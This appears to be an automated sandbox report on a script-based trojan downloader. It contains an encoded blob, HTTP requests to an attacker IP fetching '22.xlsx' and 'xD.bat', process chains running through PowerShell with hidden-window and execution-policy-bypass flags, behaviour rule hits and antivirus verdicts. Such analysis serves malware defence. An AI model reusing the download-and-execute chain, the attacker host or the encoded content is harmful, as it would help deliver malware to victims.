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
Data sent GET /22.xlsx HTTP/1.1 Host: 193.222.96.124:7287 Connection: Keep-Alive
Data sent GET /xD.bat HTTP/1.1 Host: 193.222.96.124:7287
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
host 193.222.96.124
file C:\Users\test22\AppData\Roaming\22.xlsx
file C:\Users\test22\AppData\Roaming\xD.bat
registry HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Mail\Mozilla Thunderbird\Capabilities\Hidden
Time & API Arguments Status Return Repeated

send

buffer: GET /22.xlsx HTTP/1.1 Host: 193.222.96.124:7287 Connection: Keep-Alive
socket: 1436
sent: 76
1 76 0

send

buffer: GET /xD.bat HTTP/1.1 Host: 193.222.96.124:7287
socket: 916
sent: 51
1 51 0
parent_process powershell.exe martian_process "C:\Program Files (x86)\Microsoft Office\Office15\EXCEL.EXE" /dde
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\22.xlsx
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\xD.bat
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\xD.bat"
Process injection Process 2504 resumed a thread in remote process 2588
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2588
1 0 0
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -w hidden value Attempts to execute command with a hidden window
option -executionpolicy unrestricted value Attempts to bypass execution policy
Cynet Malicious (score: 99)
Skyhigh HTA/Downloader.f
ALYac VB:Trojan.Valyria.7482
VIPRE VB:Trojan.Valyria.7482
Arcabit VB:Trojan.Valyria.D1D3A
ESET-NOD32 VBS/Agent.QVR
McAfee HTA/Downloader.f
Avast Script:SNH-gen [Drp]
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender VB:Trojan.Valyria.7482
NANO-Antivirus Trojan.Script.Downloader.jpdglv
MicroWorld-eScan VB:Trojan.Valyria.7482
Rising Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI)
Emsisoft VB:Trojan.Valyria.7482 (B)
F-Secure Malware.VBS/Dldr.Agent.VPLT
FireEye VB:Trojan.Valyria.7482
Ikarus Trojan.VBS.Agent
Google Detected
Avira VBS/Dldr.Agent.VPLT
GData VB:Trojan.Valyria.7482
Varist VBS/Agent.AZC!Eldorado
MAX malware (ai score=88)
Fortinet VBS/Agent.BSD!tr
AVG Script:SNH-gen [Drp]